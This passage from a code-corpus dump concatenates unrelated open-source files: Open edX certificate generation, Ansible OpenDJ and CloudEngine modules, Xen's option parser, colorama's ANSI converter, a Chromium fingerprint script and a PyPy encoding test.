from lms.djangoapps.instructor.access import list_with_level
from openedx.core.djangoapps.content.course_overviews.api import get_course_overview_or_none
log = logging.getLogger(__name__)
def generate_course_certificate(user, course_key, status, generation_mode):
"""
Generate a course certificate for this user, in this course run. If the certificate has a passing status, also emit
a certificate event.
Note that the certificate could be either an allowlist certificate or a "regular" course certificate; the content
will be the same either way.
Args:
user: user for whom to generate a certificate
course_key: course run key for which to generate a certificate
status: certificate status (value from the CertificateStatuses model)
        generation_mode: Used when emitting an event. Options are "self" (implying the user generated the cert
            themselves) and "batch" for everything else.
"""
cert = _generate_certificate(user, course_key, status)
if CertificateStatuses.is_passing_status(cert.status):
# Emit a certificate event
event_data = {
'user_id': user.id,
'course_id': str(course_key),
'certificate_id': cert.verify_uuid,
'enrollment_mode': cert.mode,
'generation_mode': generation_mode
}
emit_certificate_event(event_name='created', user=user, course_id=course_key, event_data=event_data)
elif CertificateStatuses.unverified == cert.status:
cert.mark_unverified(source='certificate_generation')
return cert
def _generate_certificate(user, course_key, status):
"""
Generate a certificate for this user, in this course run.
"""
# Retrieve the existing certificate for the learner if it exists
existing_certificate = GeneratedCertificate.certificate_for_student(user, course_key)
profile = UserProfile.objects.get(user=user)
profile_name = profile.name
course_grade = CourseGradeFactory().read(user, course_key=course_key)
enrollment_mode, __ = CourseEnrollment.enrollment_mode_for_user(user, course_key)
# Retain the `verify_uuid` from an existing certificate if possible, this will make it possible for the learner to
# keep the existing URL to their certificate
if existing_certificate and existing_certificate.verify_uuid:
uuid = existing_certificate.verify_uuid
else:
uuid = uuid4().hex
cert, created = GeneratedCertificate.objects.update_or_create(
user=user,
course_id=course_key,
defaults={
'user': user,
'course_id': course_key,
'mode': enrollment_mode,
'name': profile_name,
'status': status,
'grade': course_grade.percent,
'download_url': '',
'key': '',
'verify_uuid': uuid,
'error_reason': ''
}
)
if created:
created_msg = 'Certificate was created.'
else:
created_msg = 'Certificate already existed and was updated.'
log.info(f'Generated certificate with status {cert.status} for {user.id} : {course_key}. {created_msg}')
return cert
def generate_user_certificates(student, course_key, insecure=False, generation_mode='batch', forced_grade=None):
"""
It will add the add-cert request into the xqueue.
A new record will be created to track the certificate
generation task. If an error occurs while adding the certificate
    to the queue, the task will have status 'error'. It also emits an
    `edx.certificate.created` event for analytics.
This method has not yet been updated (it predates the certificates revamp). If modifying this method,
see also generate_user_certificates() in generation_handler.py (which is very similar but is not called from a
celery task). In the future these methods will be unified.
Args:
student (User)
course_key (CourseKey)
Keyword Arguments:
insecure - (Boolean)
        generation_mode - who has requested certificate generation. Its value should be `batch`
            when invoked from a django command and `self` if the student initiated the request.
        forced_grade - a string grade to use in place of the computed grade; if present, grading
            will be skipped.
"""
beta_testers_queryset = list_with_level(course_key, 'beta')
if beta_testers_queryset.filter(username=student.username):
log.info(f"Canceling Certificate Generation task for user {student.id} : {course_key}. User is a Beta Tester.")
return
xqueue = XQueueCertInterface()
if insecure:
xqueue.use_https = False
course_overview = get_course_overview_or_none(course_key)
if not course_overview:
log.info(f"Canceling Certificate Generation task for user {student.id} : {course_key} due to a missing course"
f"overview.")
return
generate_pdf = not has_html_certificates_enabled(course_overview)
cert = xqueue.add_cert(
student,
course_key,
generate_pdf=generate_pdf,
forced_grade=forced_grade
)
log.info(f"Queued Certificate Generation task for {student.id} : {course_key}")
    # If cert_status is not present in certificate valid_statuses (for example, unverified), then
    # add_cert returns None and accessing cert attributes would raise AttributeError.
if cert is None:
return
if CertificateStatuses.is_passing_status(cert.status):
emit_certificate_event('created', student, course_key, course_overview, {
'user_id': student.id,
'course_id': str(course_key),
'certificate_id': cert.verify_uuid,
'enrollment_mode': cert.mode,
'generation_mode': generation_mode
})
return cert.status
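# A minimal usage sketch for generate_course_certificate(), assuming a User and
# CourseKey are already in hand; the variable names are hypothetical and
# 'downloadable' is assumed to be a valid CertificateStatuses value:
#
#   cert = generate_course_certificate(
#       user=learner,
#       course_key=course_run_key,
#       status=CertificateStatuses.downloadable,
#       generation_mode='batch',
#   )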
|
agpl-3.0
|
ar7z1/ansible
|
lib/ansible/modules/identity/opendj/opendj_backendprop.py
|
77
|
6939
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2016, Werner Dijkerman ([email protected])
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: opendj_backendprop
short_description: Will update the backend configuration of OpenDJ via the dsconfig set-backend-prop command.
description:
- This module will update settings for OpenDJ with the command set-backend-prop.
    - It will check first via the get-backend-prop command if the configuration needs to be applied.
version_added: "2.2"
author:
- Werner Dijkerman (@dj-wasabi)
options:
opendj_bindir:
description:
- The path to the bin directory of OpenDJ.
required: false
default: /opt/opendj/bin
hostname:
description:
- The hostname of the OpenDJ server.
required: true
port:
description:
- The Admin port on which the OpenDJ instance is available.
required: true
username:
description:
- The username to connect to.
required: false
default: cn=Directory Manager
password:
description:
- The password for the cn=Directory Manager user.
- Either password or passwordfile is needed.
required: false
passwordfile:
description:
- Location to the password file which holds the password for the cn=Directory Manager user.
- Either password or passwordfile is needed.
required: false
backend:
description:
- The name of the backend on which the property needs to be updated.
required: true
name:
description:
- The configuration setting to update.
required: true
value:
description:
- The value for the configuration item.
required: true
state:
description:
- If configuration needs to be added/updated
required: false
default: "present"
'''
EXAMPLES = '''
- name: "Add or update OpenDJ backend properties"
action: opendj_backendprop
hostname=localhost
port=4444
username="cn=Directory Manager"
password=password
backend=userRoot
name=index-entry-limit
value=5000
'''
RETURN = '''
'''
from ansible.module_utils.basic import AnsibleModule
class BackendProp(object):
def __init__(self, module):
self._module = module
def get_property(self, opendj_bindir, hostname, port, username, password_method, backend_name):
my_command = [
opendj_bindir + '/dsconfig',
'get-backend-prop',
'-h', hostname,
'--port', str(port),
'--bindDN', username,
'--backend-name', backend_name,
'-n', '-X', '-s'
] + password_method
rc, stdout, stderr = self._module.run_command(my_command)
if rc == 0:
return stdout
else:
self._module.fail_json(msg="Error message: " + str(stderr))
def set_property(self, opendj_bindir, hostname, port, username, password_method, backend_name, name, value):
my_command = [
opendj_bindir + '/dsconfig',
'set-backend-prop',
'-h', hostname,
'--port', str(port),
'--bindDN', username,
'--backend-name', backend_name,
'--set', name + ":" + value,
'-n', '-X'
] + password_method
rc, stdout, stderr = self._module.run_command(my_command)
if rc == 0:
return True
else:
self._module.fail_json(msg="Error message: " + stderr)
def validate_data(self, data=None, name=None, value=None):
for config_line in data.split('\n'):
if config_line:
split_line = config_line.split()
if split_line[0] == name:
if split_line[1] == value:
return True
return False
def main():
module = AnsibleModule(
argument_spec=dict(
opendj_bindir=dict(default="/opt/opendj/bin", type="path"),
hostname=dict(required=True),
port=dict(required=True),
username=dict(default="cn=Directory Manager", required=False),
password=dict(required=False, no_log=True),
passwordfile=dict(required=False, type="path"),
backend=dict(required=True),
name=dict(required=True),
value=dict(required=True),
state=dict(default="present"),
),
supports_check_mode=True,
mutually_exclusive=[['password', 'passwordfile']],
required_one_of=[['password', 'passwordfile']]
)
opendj_bindir = module.params['opendj_bindir']
hostname = module.params['hostname']
port = module.params['port']
username = module.params['username']
password = module.params['password']
passwordfile = module.params['passwordfile']
backend_name = module.params['backend']
name = module.params['name']
value = module.params['value']
state = module.params['state']
if module.params["password"] is not None:
password_method = ['-w', password]
elif module.params["passwordfile"] is not None:
password_method = ['-j', passwordfile]
opendj = BackendProp(module)
validate = opendj.get_property(opendj_bindir=opendj_bindir,
hostname=hostname,
port=port,
username=username,
password_method=password_method,
backend_name=backend_name)
if validate:
if not opendj.validate_data(data=validate, name=name, value=value):
if module.check_mode:
module.exit_json(changed=True)
if opendj.set_property(opendj_bindir=opendj_bindir,
hostname=hostname,
port=port,
username=username,
password_method=password_method,
backend_name=backend_name,
name=name,
value=value):
module.exit_json(changed=True)
else:
module.exit_json(changed=False)
else:
module.exit_json(changed=False)
else:
module.exit_json(changed=False)
if __name__ == '__main__':
main()
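# A minimal modern-YAML task sketch equivalent to the EXAMPLES block above;
# the host, backend and value shown are illustrative only:
#
#   - name: Set index-entry-limit on the userRoot backend
#     opendj_backendprop:
#       hostname: localhost
#       port: 4444
#       username: "cn=Directory Manager"
#       password: secret
#       backend: userRoot
#       name: index-entry-limit
#       value: "5000"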
|
gpl-3.0
|
koushikcgit/xen
|
tools/python/xen/xm/opts.py
|
43
|
17981
|
#============================================================================
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#============================================================================
# Copyright (C) 2004, 2005 Mike Wray <[email protected]>
# Copyright (C) 2005 XenSource Ltd.
#============================================================================
"""Object-oriented command-line option support.
"""
import getopt
import os
import os.path
import sys
import types
def _line_wrap(text, width = 70):
lines = []
current_line = ''
words = text.strip().split()
while words:
word = words.pop(0)
if len(current_line) + len(word) + 1 < width:
current_line += word + ' '
else:
lines.append(current_line.strip())
current_line = word + ' '
if current_line:
lines.append(current_line.strip())
return lines
def wrap(text, width = 70):
""" Really basic textwrap. Useful because textwrap is not available
for Python 2.2, and textwrap.wrap ignores newlines in Python 2.3+.
"""
if len(text) < width:
return [text]
lines = []
for line in text.split('\n'):
lines += _line_wrap(line, width)
return lines
class OptionError(Exception):
def _get_message(self):
return self.__message
def _set_message(self, value):
self.__message = value
message = property(_get_message, _set_message)
"""Denotes an error in option parsing."""
def __init__(self, message, usage = ''):
self.message = message
self.usage = usage
Exception.__init__(self, message)
def __str__(self):
return self.message
class XMLFileError(Exception):
"""Thrown is input is an XML File"""
def __init__(self, XMLFile):
self.XMLFile = XMLFile
def __str__(self):
return "XMLFileError: %s" % self.XMLFile
def getFile(self):
return self.XMLFile
class Opt:
"""An individual option.
"""
def __init__(self, opts, name, short=None, long=None,
val=None, fn=None, use=None, default=None):
"""Create an option.
opts parent options object
name name of the field it controls
short short (1-char) command line switch (optional)
long long command-line switch. Defaults to option name.
val string used to print option args in help.
If val is not specified the option has no arg.
fn function to call when the option is specified.
use usage (help) string
default default value if not specified on command-line
"""
self.opts = opts
self.name = name
self.short = short
if long is None:
long = name
self.long = long
self.val = val
self.use = use
self.default = default
self.optkeys = []
if self.short:
self.optkeys.append('-' + self.short)
if self.long:
self.optkeys.append('--' + self.long)
self.fn = fn
self.specified_opt = None
self.specified_val = None
self.value = None
self.set(default)
def reset(self):
self.specified_opt = None
self.specified_val = None
self.value = None
self.set(self.default)
def __repr__(self):
return self.name + '=' + str(self.specified_val)
def __str__(self):
""" Formats the option into:
'-k, --key description'
"""
PARAM_WIDTH = 20
if self.val:
keys = ', '.join(['%s=%s' % (k, self.val) for k in self.optkeys])
else:
keys = ', '.join(self.optkeys)
desc = wrap(self.use, 55)
if len(keys) > PARAM_WIDTH:
desc = [''] + desc
wrapped = ('\n' + ' ' * (PARAM_WIDTH + 1)).join(desc)
return keys.ljust(PARAM_WIDTH + 1) + wrapped
def set(self, value):
"""Set the option value.
"""
self.opts.setopt(self.name, value)
def get(self):
"""Get the option value.
"""
return self.opts.getopt(self.name)
def append(self, value):
"""Append a value to the option value.
"""
v = self.get() or []
v.append(value)
self.set(v)
def short_opt(self):
"""Short option spec.
"""
if self.short:
if self.val:
return self.short + ':'
else:
return self.short
else:
return None
def long_opt(self):
"""Long option spec.
"""
if self.long:
if self.val:
return self.long + '='
else:
return self.long
else:
return None
def format(self, str, start=' ', out=sys.stdout):
"""Print a string, with consistent indentation at the start of lines.
"""
lines = str.split('\n')
for l in lines:
l = l.strip()
if start:
out.write(start)
out.write(l)
out.write('\n')
def show(self, out=sys.stdout):
sep = ' '
for x in self.optkeys:
out.write(sep)
out.write(x)
sep = ', '
if self.val:
out.write(' ')
out.write(self.val)
out.write('\n')
if self.use:
self.format(self.use, out=out);
if self.val:
self.format('Default ' + str(self.default or 'None'), out=out)
def specify(self, k, v):
"""Specify the option. Called when the option is set
from the command line.
k option switch used
v optional value given (if any)
"""
if k in self.optkeys:
if self.val is None and v:
self.opts.err("Option '%s' does not take a value" % k)
self.specified_opt = k
self.specified_val = v
if self.fn:
self.fn(self, k, v)
return 1
else:
return 0
def specified(self):
"""Test whether the option has been specified: set
from the command line.
"""
return self.specified_opt
class OptVar(Opt):
"""An individual option variable.
"""
def __init__(self, opts, name,
val=None, fn=None, use=None, default=None):
"""Create an option.
opts parent options object
name name of the field it controls
val string used to print option args in help.
If val is not specified the option has no arg.
fn function to call when the option is specified.
use usage (help) string
default default value if not specified on command-line
"""
if val is None:
val = name.upper()
Opt.__init__(self, opts, name, val=val, fn=fn, use=use, default=default)
self.optkeys = []
self.optkeys.append(self.long)
def short_opt(self):
return None
def long_opt(self):
return None
def show(self, out=sys.stdout):
print >>out, ' %s=%s' % (self.optkeys[0], self.val)
if self.use:
self.format(self.use, out=out);
if self.val:
self.format('Default ' + str(self.default or 'None'), out=out)
class OptVals:
"""Class to hold option values.
"""
def __init__(self):
self.quiet = False
class Opts:
"""Container for options.
"""
imports = ["import sys",
"import os",
"import os.path",
"from xen.util.ip import *",
]
def __init__(self, use=None):
"""Options constructor.
use usage string
"""
self.use = use
# List of options.
self.options = []
# Options indexed by name.
self.options_map = {}
# Command-line arguments.
self.argv = []
# Option values.
self.vals = OptVals()
# Variables for default scripts.
self.vars = {}
# Option to use for bare words.
self.default_opt = None
def reset(self):
self.vals = OptVals()
self.vars = {}
for opt in self.options:
opt.reset()
def __repr__(self):
return '\n'.join(map(str, self.options))
def __str__(self):
options = [s for s in self.options if s.optkeys[0][0] == '-']
output = ''
if options:
output += '\nOptions:\n\n'
output += '\n'.join([str(o) for o in options])
output += '\n'
return output
def val_usage(self):
optvals = [s for s in self.options if s.optkeys[0][0] != '-']
output = ''
if optvals:
output += '\nValues:\n\n'
output += '\n'.join([str(o) for o in optvals])
output += '\n'
return output
def opt(self, name, **args):
"""Add an option.
name option name
**args keyword params for option constructor
"""
x = Opt(self, name, **args)
self.options.append(x)
self.options_map[name] = x
return x
def default(self, name):
self.default_opt = name
def getdefault(self, val):
if self.default_opt is None:
return 0
opt = self.option(self.default_opt)
return opt.set(val)
def var(self, name, **args):
x = OptVar(self, name, **args)
self.options.append(x)
self.options_map[name] = x
return x
def setvar(self, var, val):
"""Set a default script variable.
"""
self.vars[var] = val
def getvar(self, var):
"""Get a default script variable.
"""
return self.vars.get(var)
def option(self, name):
"""Get an option (object).
"""
return self.options_map.get(name)
def setopt(self, name, val):
"""Set an option value.
An option can also be set using 'opts.vals.name = val'.
"""
setattr(self.vals, name, val)
def getopt(self, name):
"""Get an option value.
An option value can also be got using 'opts.vals.name'.
"""
return getattr(self.vals, name)
def specified(self, name):
"""Test if an option has been specified.
"""
opt = self.option(name)
return opt and opt.specified()
def err(self, msg):
"""Print an error to stderr and exit.
"""
print >>sys.stderr, "Error:", msg
sys.exit(1)
def info(self, msg):
"""Print a message to stdout (unless quiet is set).
"""
if self.vals.quiet: return
print msg
def warn(self, msg):
"""Print a warning to stdout.
"""
print >>sys.stderr, "Warning:", msg
def parse(self, argv):
"""Parse arguments argv using the options.
return remaining arguments
"""
self.argv = argv
# hack to work around lack of gnu getopts parsing in python 2.2
args = argv[1:]
xargs = []
while args:
# let getopt parse whatever it feels like -- if anything
try:
(xvals, args) = getopt.getopt(args[0:],
self.short_opts(),
self.long_opts())
except getopt.GetoptError, err:
raise OptionError(str(err), self.use)
#self.err(str(err))
for (k, v) in xvals:
for opt in self.options:
if opt.specify(k, v): break
else:
raise OptionError('Unknown option: %s' % k, self.use)
if not args:
break
# then process the 1st arg
(arg,args) = (args[0], args[1:])
isvar = 0
if '=' in arg:
(k, v) = arg.split('=', 1)
for opt in self.options:
if opt.specify(k, v):
isvar = 1
break
elif self.getdefault(arg):
isvar = 1
if not isvar:
xargs.append(arg)
return xargs
def short_opts(self):
"""Get short options specifier for getopt.
"""
l = []
for x in self.options:
y = x.short_opt()
if not y: continue
l.append(y)
return ''.join(l)
def long_opts(self):
"""Get long options specifier for getopt.
"""
l = []
for x in self.options:
y = x.long_opt()
if not y: continue
l.append(y)
return l
def usage(self):
print 'Usage: ', self.argv[0], self.use or 'OPTIONS'
print
if self.options:
for opt in self.options:
opt.show()
print
print
def var_usage(self):
if self.vars:
print 'The config file defines the following variables:'
for var in self.vars:
var.show()
print
print
def config_usage(self):
if self.imports:
            print 'The following are automatically imported:'
for x in self.imports:
print ' ', x
print
self.var_usage()
def load_defconfig(self, help=0):
"""Load a defconfig script. Assumes these options set:
'path' search path
'defconfig' script name
"""
for x in [ '' ] + self.vals.path.split(':'):
if x:
p = os.path.join(x, self.vals.defconfig)
else:
p = self.vals.defconfig
if not p.startswith('/'):
p = os.path.join(os.path.curdir, p)
if os.path.exists(p):
self.info('Using config file "%s".' % p)
f = open(p)
is_xml = (f.read(1) == '<')
f.close()
if is_xml:
raise XMLFileError(p)
self.load(p, help)
break
else:
raise OptionError('Unable to open config file: %s' % \
self.vals.defconfig,
self.use)
def load(self, defconfig, help):
"""Load a defconfig file. Local variables in the file
are used to set options with the same names.
Variables are not used to set options that are already specified.
"""
# Create global and local dicts for the file.
# Initialize locals to the vars.
# Use exec to do the standard imports and
# define variables we are passing to the script.
globs = {}
locs = {}
locs.update(self.vars)
cmd = '\n'.join(self.imports +
[ "from xen.xm.help import Vars",
"xm_file = '%s'" % defconfig,
"xm_help = %d" % help,
"xm_vars = Vars(xm_file, xm_help, locals())"
])
exec cmd in globs, locs
try:
execfile(defconfig, globs, locs)
except SyntaxError,e:
raise SyntaxError, \
"Errors were found at line %d while processing %s:\n\t%s"\
%(e.lineno,defconfig,e.text)
except:
if not help: raise
if help:
self.config_usage()
return
# Extract the values set by the script and set the corresponding
# options, if not set on the command line.
vtypes = [ types.StringType,
types.ListType,
types.IntType,
types.FloatType
]
for (k, v) in locs.items():
if self.specified(k): continue
if not(type(v) in vtypes): continue
self.setopt(k, v)
def set_true(opt, k, v):
"""Set an option true."""
opt.set(1)
def set_false(opt, k, v):
"""Set an option false."""
opt.set(0)
def set_bool(opt, k, v):
"""Set a boolean option.
"""
if v in ('yes', 'y'):
opt.set(1)
elif v in ('no', 'n'):
opt.set(0)
else:
        opt.opts.err('Invalid value: ' + v)
def set_value(opt, k, v):
"""Set an option to a value."""
opt.set(v)
def set_int(opt, k, v):
"""Set an option to an integer value."""
try:
v = int(v)
except:
opt.opts.err('Invalid value: ' + str(v))
opt.set(v)
def set_long(opt, k, v):
"""Set an option to a long integer value."""
try:
v = long(v)
except:
opt.opts.err('Invalid value: ' + str(v))
opt.set(v)
def set_float(opt, k, v):
"""Set an option to a float value."""
try:
v = float(v)
except:
opt.opts.err('Invalid value: ' + str(v))
opt.set(v)
def append_value(opt, k, v):
"""Append a value to a list option."""
opt.append(v)
def set_var(opt, k, v):
"""Set a default script variable.
"""
(var, val) = v.strip().split('=', 1)
opt.opts.setvar(var.strip(), val.strip())
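# A minimal usage sketch for the Opts/Opt/OptVar machinery above; the option
# names and defaults are illustrative, not taken from any xm subcommand:
#
#   gopts = Opts(use='[options] [vars]')
#   gopts.opt('quiet', short='q', fn=set_true, default=0, use='Quiet output.')
#   gopts.var('memory', val='MEMORY', fn=set_int, default=128,
#             use='Domain memory in MB.')
#   rest = gopts.parse(['demo', '-q', 'memory=256'])
#   # gopts.vals.quiet == 1, gopts.vals.memory == 256, rest == []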
|
gpl-2.0
|
kimegitee/python-koans
|
python2/libs/colorama/ansitowin32.py
|
287
|
6621
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import re
import sys
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
from .winterm import WinTerm, WinColor, WinStyle
from .win32 import windll
if windll is not None:
winterm = WinTerm()
def is_a_tty(stream):
return hasattr(stream, 'isatty') and stream.isatty()
class StreamWrapper(object):
'''
Wraps a stream (such as stdout), acting as a transparent proxy for all
attribute access apart from method 'write()', which is delegated to our
Converter instance.
'''
def __init__(self, wrapped, converter):
# double-underscore everything to prevent clashes with names of
# attributes on the wrapped stream object.
self.__wrapped = wrapped
self.__convertor = converter
def __getattr__(self, name):
return getattr(self.__wrapped, name)
def write(self, text):
self.__convertor.write(text)
class AnsiToWin32(object):
'''
Implements a 'write()' method which, on Windows, will strip ANSI character
sequences from the text, and if outputting to a tty, will convert them into
win32 function calls.
'''
ANSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
# The wrapped stream (normally sys.stdout or sys.stderr)
self.wrapped = wrapped
# should we reset colors to defaults after every .write()
self.autoreset = autoreset
# create the proxy wrapping our output stream
self.stream = StreamWrapper(wrapped, self)
on_windows = sys.platform.startswith('win')
# should we strip ANSI sequences from our output?
if strip is None:
strip = on_windows
self.strip = strip
        # should we convert ANSI sequences into win32 calls?
if convert is None:
convert = on_windows and is_a_tty(wrapped)
self.convert = convert
# dict of ansi codes to win32 functions and parameters
self.win32_calls = self.get_win32_calls()
# are we wrapping stderr?
self.on_stderr = self.wrapped is sys.stderr
def should_wrap(self):
'''
True if this class is actually needed. If false, then the output
stream will not be affected, nor will win32 calls be issued, so
wrapping stdout is not actually required. This will generally be
False on non-Windows platforms, unless optional functionality like
autoreset has been requested using kwargs to init()
'''
return self.convert or self.strip or self.autoreset
def get_win32_calls(self):
if self.convert and winterm:
return {
AnsiStyle.RESET_ALL: (winterm.reset_all, ),
AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
AnsiFore.RED: (winterm.fore, WinColor.RED),
AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
AnsiFore.RESET: (winterm.fore, ),
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
AnsiBack.RED: (winterm.back, WinColor.RED),
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
AnsiBack.BLUE: (winterm.back, WinColor.BLUE),
AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
AnsiBack.RESET: (winterm.back, ),
}
def write(self, text):
if self.strip or self.convert:
self.write_and_convert(text)
else:
self.wrapped.write(text)
self.wrapped.flush()
if self.autoreset:
self.reset_all()
def reset_all(self):
if self.convert:
self.call_win32('m', (0,))
elif is_a_tty(self.wrapped):
self.wrapped.write(Style.RESET_ALL)
def write_and_convert(self, text):
'''
Write the given text to our wrapped stream, stripping any ANSI
sequences from the text, and optionally converting them into win32
calls.
'''
cursor = 0
for match in self.ANSI_RE.finditer(text):
start, end = match.span()
self.write_plain_text(text, cursor, start)
self.convert_ansi(*match.groups())
cursor = end
self.write_plain_text(text, cursor, len(text))
def write_plain_text(self, text, start, end):
if start < end:
self.wrapped.write(text[start:end])
self.wrapped.flush()
def convert_ansi(self, paramstring, command):
if self.convert:
params = self.extract_params(paramstring)
self.call_win32(command, params)
def extract_params(self, paramstring):
def split(paramstring):
for p in paramstring.split(';'):
if p != '':
yield int(p)
return tuple(split(paramstring))
def call_win32(self, command, params):
        if command == 'm':
            # An empty SGR parameter list is equivalent to a single 0 (reset all).
            if not params:
                params = (0,)
            for param in params:
if param in self.win32_calls:
func_args = self.win32_calls[param]
func = func_args[0]
args = func_args[1:]
kwargs = dict(on_stderr=self.on_stderr)
func(*args, **kwargs)
elif command in ('H', 'f'): # set cursor position
func = winterm.set_cursor_position
func(params, on_stderr=self.on_stderr)
        elif command == 'J':
            func = winterm.erase_data
            func(params, on_stderr=self.on_stderr)
        elif command == 'A':
            if params == () or params is None:
num_rows = 1
else:
num_rows = params[0]
func = winterm.cursor_up
func(num_rows, on_stderr=self.on_stderr)
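# A minimal usage sketch; on non-Windows platforms the wrapper is effectively a
# pass-through unless stripping or autoreset is requested. The escape codes are
# standard ANSI SGR sequences:
#
#   import sys
#   wrapper = AnsiToWin32(sys.stdout, autoreset=True)
#   stream = wrapper.stream if wrapper.should_wrap() else sys.stdout
#   stream.write('\033[31m' + 'hello in red' + '\033[0m\n')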
|
mit
|
ltilve/chromium
|
gin/fingerprint/fingerprint_v8_snapshot.py
|
64
|
2442
|
#!/usr/bin/env python
#
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Fingerprints the V8 snapshot blob files.
Constructs a SHA256 fingerprint of the V8 natives and snapshot blob files and
creates a .cc file which includes these fingerprints as variables.
"""
import hashlib
import optparse
import os
import sys
_HEADER = """// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file was generated by fingerprint_v8_snapshot.py.
namespace gin {
"""
_FOOTER = """
} // namespace gin
"""
def FingerprintFile(file_path):
input_file = open(file_path, 'rb')
sha256 = hashlib.sha256()
while True:
block = input_file.read(sha256.block_size)
if not block:
break
sha256.update(block)
return sha256.digest()
def WriteFingerprint(output_file, variable_name, fingerprint):
output_file.write('\nextern const unsigned char %s[] = { ' % variable_name)
for byte in fingerprint:
output_file.write(str(ord(byte)) + ', ')
output_file.write('};\n')
def WriteOutputFile(natives_fingerprint,
snapshot_fingerprint,
output_file_path):
output_dir_path = os.path.dirname(output_file_path)
if not os.path.exists(output_dir_path):
os.makedirs(output_dir_path)
output_file = open(output_file_path, 'w')
output_file.write(_HEADER)
WriteFingerprint(output_file, 'g_natives_fingerprint', natives_fingerprint)
output_file.write('\n')
WriteFingerprint(output_file, 'g_snapshot_fingerprint', snapshot_fingerprint)
output_file.write(_FOOTER)
def main():
parser = optparse.OptionParser()
parser.add_option('--snapshot_file',
help='The input V8 snapshot blob file path.')
parser.add_option('--natives_file',
help='The input V8 natives blob file path.')
parser.add_option('--output_file',
                    help='The path for the output cc file which will be written.')
options, _ = parser.parse_args()
natives_fingerprint = FingerprintFile(options.natives_file)
snapshot_fingerprint = FingerprintFile(options.snapshot_file)
WriteOutputFile(
natives_fingerprint, snapshot_fingerprint, options.output_file)
return 0
if __name__ == '__main__':
sys.exit(main())
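# A minimal invocation sketch; all three paths are hypothetical examples of a
# Chromium output directory layout:
#
#   python fingerprint_v8_snapshot.py \
#       --natives_file=out/Release/natives_blob.bin \
#       --snapshot_file=out/Release/snapshot_blob.bin \
#       --output_file=gen/gin/v8_snapshot_fingerprint.cc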
|
bsd-3-clause
|
shiblon/pytour
|
static/js/pypyjs/pypy-nojit.js-0.3.1/lib/modules/test/test_coding.py
|
121
|
1212
|
import test.test_support, unittest
import os
class CodingTest(unittest.TestCase):
def test_bad_coding(self):
module_name = 'bad_coding'
self.verify_bad_module(module_name)
def test_bad_coding2(self):
module_name = 'bad_coding2'
self.verify_bad_module(module_name)
def verify_bad_module(self, module_name):
self.assertRaises(SyntaxError, __import__, 'test.' + module_name)
path = os.path.dirname(__file__)
filename = os.path.join(path, module_name + '.py')
with open(filename) as fp:
text = fp.read()
self.assertRaises(SyntaxError, compile, text, filename, 'exec')
def test_error_from_string(self):
# See http://bugs.python.org/issue6289
input = u"# coding: ascii\n\N{SNOWMAN}".encode('utf-8')
with self.assertRaises(SyntaxError) as c:
compile(input, "<string>", "exec")
expected = "'ascii' codec can't decode byte 0xe2 in position 16: " \
"ordinal not in range(128)"
self.assertTrue(c.exception.args[0].startswith(expected))
def test_main():
test.test_support.run_unittest(CodingTest)
if __name__ == "__main__":
test_main()
|
apache-2.0
|
cetic/ansible
|
lib/ansible/modules/network/cloudengine/ce_snmp_location.py
|
39
|
6774
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: ce_snmp_location
version_added: "2.4"
short_description: Manages SNMP location configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP location configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@CloudEngine-Ansible)
options:
location:
description:
- Location information.
required: true
default: null
state:
description:
- Manage the state of the resource.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: CloudEngine snmp location test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP location"
ce_snmp_location:
